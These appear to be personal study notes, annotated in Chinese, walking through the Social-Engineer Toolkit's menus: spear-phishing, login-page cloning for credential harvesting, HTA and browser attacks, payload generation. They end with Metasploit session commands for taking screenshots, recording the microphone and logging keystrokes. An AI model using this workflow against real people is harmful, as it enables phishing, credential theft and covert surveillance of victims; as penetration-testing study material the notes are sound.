简介:
Select from the menu:
1) Social-Engineering Attacks #社会工程学攻击
2) Fast-Track Penetration Testing #快速追踪渗透测试
3) Third Party Modules #第三方模块
4) Update the Social-Engineer Toolkit #更新软件
5) Update SET configuration #升级配置(每次设置完set.config需要)
6) Help, Credits, and About #关于
-----输入1
1) Spear-Phishing Attack Vectors #鱼叉式钓鱼攻击向量(也称针对性钓鱼攻击)
2) Website Attack Vectors #网页攻击向量
3) Infectious Media Generator #媒介感染生成器
4) Create a Payload and Listener #生成一个payload和监听
5) Mass Mailer Attack #大规模邮件钓鱼
6) Arduino-Based Attack Vector #基于Arduino的攻击(类似于单片机)
7) Wireless Access Point Attack Vector #无线接入点攻击
8) QRCode Generator Attack Vector #二维码攻击
9) Powershell Attack Vectors #powershell攻击
10) Third Party Modules #第三方模块
-------输入2
1) Java Applet Attack Method #java程序攻击(这里会欺骗用户进行java升级,内含payload,可能太old,win7实测无效)
2) Metasploit Browser Exploit Method #基于metasploit的浏览器攻击
3) Credential Harvester Attack Method #认证获取攻击(搭建web,克隆登陆网页,获取认证信息,实测克隆qq邮箱登陆页不行)
4) Tabnabbing Attack Method #标签劫持攻击
5) Web Jacking Attack Method #网页劫持攻击
6) Multi-Attack Web Method #综合攻击
7) Full Screen Attack Method #全屏攻击
8) HTA Attack Method #HTA攻击(当用户访问设计好的网页时,会提示选择保留/放弃keep/discard,实测时会有https认证错误)
-----输入2
1) Web Templates #网页模板(只有google,facebook,twitter,yahoo,java required这几个选项,可以自己添加)
2) Site Cloner #站点克隆(有些网页克隆会出现问题,只能克隆一些简单的网页)
3) Custom Import #自定义输入
--------
setoolkit +msf
sudo setoolkit
1 》 4
配置并生成木马文件
sessions -i
sessions 1
screenshot ---获取屏幕截图
record_mic -d 10 录制10秒钟声音
keyscan_start 开启键盘记录
keyscan_dump 查看键盘记录到的内容
